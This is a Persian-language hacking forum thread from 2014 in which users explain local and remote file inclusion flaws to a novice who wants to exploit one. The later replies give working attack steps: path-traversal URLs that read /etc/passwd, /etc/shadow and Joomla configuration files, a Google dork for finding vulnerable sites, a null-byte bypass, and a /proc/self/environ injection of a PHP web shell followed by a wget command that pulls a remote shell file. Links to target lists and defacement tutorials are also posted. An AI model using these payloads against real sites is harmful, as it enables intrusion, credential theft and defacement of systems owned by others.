اطلاعیه

**Sk7** · 06-15-2014, 08:24 AM

RE: درخواست راهنمایی درباره ی اروری که مربوط به یکی از باگ های Lfi یا Rfu هست

با اجازه برادران

با توجه به تابع

کد:

file_get_contents

و با توجه به بارگذاری یک لینک ریموت این آسیب پذیری RFI میباشد .

در ضمن شما میتوانید فایلهای داخلی را تست نمایید اگر فایلهای داخلی دانلود شدند که درنهایت منجر به دانلود فایلهای #config میشود آسیب پذیری LFD نیز موجود می باشد.

همچنین اگر بتوانید فایلهای داخلی local را نیز بخوانید آسیب پذیری LFI میباشد .

و بطور کلی ربطی به RFU ندارد .

**Ali_Sedaghat** · 06-15-2014, 09:18 AM

RE: درخواست راهنمایی درباره ی اروری که مربوط به یکی از باگ های Lfi یا Rfu هست

ممنون بابت پاسخ جامع تون
من دیشب حواسم نبود و به جای Rfi نوشتم Rfu. که از این بابت از شما عذرخواهی می کنم.
با توجه به این که من با این باگ ها اصلاً کار نکرده ام می خواستم بپرسم که اسم فایل های داخلی رو در کدوم قسمت باید وارد کنم؟ باید به جای عدد 123 بنویسم. آیا الگوی خاصی برای این کار وجود داره؟
ممنون میشم اگه راهنمایی بفرمایید.
با تقدیم احترام
صداقت

**Mr.XpR** · 06-15-2014, 03:45 PM

RE: درخواست راهنمایی درباره ی اروری که مربوط به یکی از باگ های Lfi یا Rfu هست

میتونه شامل فایلهای مثل shadow و یا passwd و ... باشه ، مسیر یک شاخه مشخص و یا مسیر یک کانفیگ و ....

یه مقدار در مورد این آسیب پذیری در انجمن جستجو کنید :

https://www.google.com/search?q=lfi&sitesearch=iranhack.com%2Facc&gws_rd= ssl

دیتا و آموزش های فراوانی براش گذاشتیم

LFI Dork + Upload shell & deface + Report zone-h

LFI & RFI Targets

آموزش Patch کردن باگ های LFD , RFI , LFI

**Sk7** · 06-16-2014, 09:07 AM

RE: درخواست راهنمایی درباره ی اروری که مربوط به یکی از باگ های Lfi یا Rfu هست

با اجازه

ببین برادر به اینصورت هست شکل کلی

کد:

http://localhost/index.php?option=../../../../../../../../../../etc/passwd
http://localhost/index.php?option=../../../../../../../../../../etc/shadow
http://localhost/index.php?option=../../../../../../../../../../proc/self/environ
http://localhost/joomla/index.php?option=../configuration.php
http://localhost/index.php?option=../../../../../../../../../../home/user/public_html/configuration.php

google dork: inurl:.php?page=

example:www.local.com/contacts.php?page=abc.php

test:www.local.com/contacts.php?page=../xyz.php

now in linux server server there is etc/password

1... www.local.com/index
../
=../../../etc/passwd
=../../../etc/passwd%00

etc/passwdfile (google)
proc/self/environ is the writable file by end
or var/log/httpd-access.log is also writable

proc/self/environ
add one- user agent switcher

config.php
<?php passthru($_GET['cmd']) ?>
../proc/self//environ&cmd=wget http://
t35.com/abc.txt O shell.php

config.php
ip
username
pwd

Done..

اگر proc/self/environ قابل خواندن باشد . دسترسی را میشود اعمال کرد که برادر عزیزمون در فیلم بالا توضیح دادن .

اطلاعیه

درخواست راهنمایی درباره ی اروری که مربوط به یکی از باگ های Lfi یا Rfu هست

درخواست راهنمایی درباره ی اروری که مربوط به یکی از باگ های Lfi یا Rfu هست

نظر

نظر

نظر

نظر